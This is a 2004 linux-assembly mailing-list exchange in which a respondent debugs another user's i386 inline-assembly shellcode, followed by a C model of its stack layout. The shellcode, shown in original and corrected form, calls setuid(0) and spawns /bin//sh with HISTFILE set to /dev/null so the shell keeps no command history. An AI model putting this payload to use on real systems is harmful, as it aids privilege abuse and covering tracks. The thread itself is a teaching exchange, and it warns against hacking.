From: Frederic Marmond <fmarmond@eprocess.fr>
To: Danett song <danett18@yahoo.com.br>
Cc: linux-assembly@vger.kernel.org
Subject: Re: execve with env..
Date: Fri, 28 May 2004 10:54:48 +0200
Message-ID: <40B6FE58.4030405@eprocess.fr>
In-Reply-To: <20040527210502.96393.qmail@web90105.mail.scd.yahoo.com>
Hi Danett,
I finally had time to have a look at your code.
1st: the translations (hexa -> ascii) you gave were wrong. If you play
with assembly, you have to be rigorous and document your code well.
2nd: have a look at
http://www.linuxfocus.org/English/March2001/article183.shtml (many
language translations available), as it may give you information about
what you seem to want to do.
3rd: have a look at the code. I've modified some lines (my tag is 'FMD')
FMD~ => I changed this line
FMD+ => I added this line
FMD- => I removed this line
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
// FMD+: FALSE "put /bin//bash at stack"
// FMD+: it is not "bash", but "sh" you give as parameter.
// FMD+: it's not a problem, but please, next time, make right comments!
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push %eax \n" //FMD+: you've forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
// "push $0x54534949 \n" // FMD-: TSII
"push $0x54534948 \n" // FMD+: TSIH
// FMD+: FALSE: "HISTFILE=//dev//null"
// FMD+: wrong hexa code, you wrote "IISTFILE=...", instead of "HISTFILE=..."
"mov %esp, %edx \n" // FMD+: back up the string pointer
"push %eax \n" // put zero at stack
"push %edx \n" // FMD+: put the env string here in stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
As you can see, a few typos in your comments and hexa strings.
But the most important thing is that you have to pass the 3rd argument to execve
exactly as its 2nd (char *[]).
I hope your intention is not to hack someone else's system, and that you
play with that only for learning purposes...
Keep in mind there is always someone (stronger than you and than me)
who may catch you if you pirate something...
If you have another question, feel free to ask! ;)
Fred
Danett song wrote:
>Hi fmarmond,
>
>>I have no time today, but I'll try to help you
>>tomorrow.
>
>Thkz a lot! :)
>
>>Can you provide a commented version of your code?
>
>Yah, look below...
>
>#include <stdio.h>
>
>int main(){
>
>__asm__(
> "xor %eax, %eax \n" // set 0 to %eax
> "xor %ebx, %ebx \n" // 1 arg setuid (zero)
> "mov $0x17, %al \n" // call setuid
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // set 0 to %eax
> "push %eax \n" // put zero at stack
> "push $0x68732F2F \n"
> "push $0x6E69622F \n" // put /bin//bash at stack
> "mov %esp,%ebx \n" // Copy 1arg execve
> "push %eax \n" // put zero at stack
> "push %ebx \n" // put %ebx at stack
> "mov %esp, %ecx \n" // Copy 2arg execve
> "xor %edx, %edx \n" // set 0 to %edx
> "push $0x6C6C756E \n"
> "push $0x2F2F7665 \n"
> "push $0x642F2F3D \n"
> "push $0x454C4946 \n"
> "push $0x54534948 \n" // HISTFILE=//dev//null
> "push %eax \n" // put zero at stack
> "mov %esp, %edx \n" // copy 3arg execve
> "mov $0x0b, %al \n" // call execve
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // 1arg of exit (zero)
> "mov $0x01,%al \n" // call exit
> "int $0x80 \n" // kernel mode
> );
>
>return(0);
>}
>
>Thkz,
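Added example, not code from either message in the thread: a small C model of the i386 stack that replays the push sequences above and decodes what execve would receive in %ebx, %ecx and %edx. It shows each pushed immediate in memory order (the hex reads "backwards" because the word is stored least-significant byte first) and why, without the extra push %eax and the second char *[] layout, the original version hands execve an empty environment. The stack model, replay() and its helpers are constructed for this illustration.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model (not the list's code) of the i386 stack the pushes above
 * build on: a byte array, 32-bit words stored little-endian, %esp simulated as
 * an offset that grows downward. A trailing NUL keeps str_at() in bounds. */
#define STACK_SIZE 256
static uint8_t stack_mem[STACK_SIZE + 1];
static uint32_t esp;                 /* simulated %esp: offset into stack_mem */

static void stack_reset(void) {      /* 0xAA junk, as a real stack would hold */
    memset(stack_mem, 0xAA, STACK_SIZE); stack_mem[STACK_SIZE] = 0; esp = STACK_SIZE;
}

static void push32(uint32_t v) {     /* push: %esp -= 4, store LSB first */
    esp -= 4;
    for (int i = 0; i < 4; i++) stack_mem[esp + i] = (uint8_t)(v >> (8 * i));
}

static uint32_t word_at(uint32_t off) {      /* read a little-endian word */
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)stack_mem[off + i] << (8 * i);
    return v;
}

/* The C string a pointer (here: a stack offset) would address */
static const char *str_at(uint32_t off) { return (const char *)&stack_mem[off]; }
struct execve_args { uint32_t ebx, ecx, edx; };   /* path, argv, envp */

/* Replay the push sequence from the thread. fixed=1 is the FMD-corrected
 * version (NUL pushed before the env string, envp built as a char *[]),
 * fixed=0 the original. */
static struct execve_args replay(int fixed) {
    struct execve_args a;
    stack_reset();
    push32(0);                       /* push %eax: NUL that ends the path     */
    push32(0x68732F2F);              /* bytes 2F 2F 73 68 in memory: "//sh"  */
    push32(0x6E69622F);              /* bytes 2F 62 69 6E in memory: "/bin"  */
    a.ebx = esp;                     /* mov %esp,%ebx -> "/bin//sh"           */
    push32(0); push32(a.ebx);
    a.ecx = esp;                     /* argv = { "/bin//sh", NULL }           */
    if (fixed) push32(0);            /* the forgotten push %eax               */
    push32(0x6C6C756E); push32(0x2F2F7665); push32(0x642F2F3D);
    push32(0x454C4946); push32(0x54534948);  /* "HISTFILE=//dev//null"       */
    uint32_t env = esp;              /* start of the env string               */
    if (fixed) { push32(0); push32(env); }   /* envp = { env, NULL }          */
    else push32(0);                  /* original: %edx -> a lone zero word    */
    a.edx = esp;                     /* mov %esp,%edx                         */
    return a;
}
```

In the original sequence the env string is also not NUL-terminated: the bytes that follow it are the argv pointer word pushed earlier, so its length as read by a C string function is one byte too long.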